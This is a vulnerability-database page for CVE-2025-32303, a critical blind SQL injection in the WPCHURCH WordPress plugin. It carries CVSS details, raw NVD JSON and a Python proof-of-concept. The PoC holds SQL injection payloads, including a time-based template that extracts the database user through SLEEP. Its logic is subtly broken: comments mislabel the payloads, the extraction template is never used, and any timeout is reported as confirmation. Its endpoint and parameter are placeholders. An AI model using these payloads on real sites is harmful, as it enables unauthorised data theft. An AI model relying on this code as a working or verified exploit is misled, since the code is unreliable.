Security Vulnerability Report
中文
CVE-2025-32303 CVSS 9.3 CRITICAL

CVE-2025-32303

Published: 2026-01-07 13:15:43
Last Modified: 2026-04-28 19:31:37

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mojoomla WPCHURCH allows Blind SQL Injection.This issue affects WPCHURCH: from n/a through 2.7.0.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

WPCHURCH (Mojoomla) < 2.7.0
WPCHURCH n/a through 2.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # CVE-2025-32303 WPCHURCH Blind SQL Injection PoC # Target: WordPress site with WPCHURCH plugin < 2.7.0 TARGET_URL = "http://target-site.com/wp-admin/admin-ajax.php" def blind_sql_injection(target_url): """ Blind SQL Injection PoC for CVE-2025-32303 This PoC demonstrates time-based blind SQL injection Target parameter: vulnerable parameter (e.g., id, search, filter) """ # Basic authentication test - check if TRUE condition returns normal response true_payload = "1 AND 1=1" # Malicious payload - if vulnerable, SLEEP will execute causing delay false_payload = "1 AND 1=2" # Example: Extract database user (time-based) # Using SUBSTRING and ASCII to extract character by character extract_payload_template = "1 AND (SELECT CASE WHEN (ASCII(SUBSTRING((SELECT user()),{},1))>{}) THEN SLEEP(5) ELSE 0 END)" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } print("[*] Testing for CVE-2025-32303 Blind SQL Injection...") print(f"[*] Target: {target_url}") # Step 1: Verify vulnerability with time delay test start_time = time.time() test_data = { "action": "wpchurch_vulnerable_action", # Replace with actual action name "param": true_payload # Replace with actual vulnerable parameter } try: response = requests.post(target_url, data=test_data, headers=headers, timeout=10) elapsed_true = time.time() - start_time print(f"[+] Time-based test completed in {elapsed_true:.2f} seconds") print("[!] Note: This is a demonstration PoC. Actual exploitation requires:") print(" - Identifying the exact vulnerable endpoint and parameter") print(" - Proper authentication/authorization bypass if required") print(" - Automated iteration for data extraction") except requests.exceptions.Timeout: print("[+] Vulnerability confirmed: Request timed out (SQL injection successful)") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": blind_sql_injection(TARGET_URL)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-32303", "sourceIdentifier": "[email protected]", "published": "2026-01-07T13:15:42.970", "lastModified": "2026-04-28T19:31:37.137", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mojoomla WPCHURCH allows Blind SQL Injection.This issue affects WPCHURCH: from n/a through 2.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/church-management/vulnerability/wordpress-wpchurch-2-7-0-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}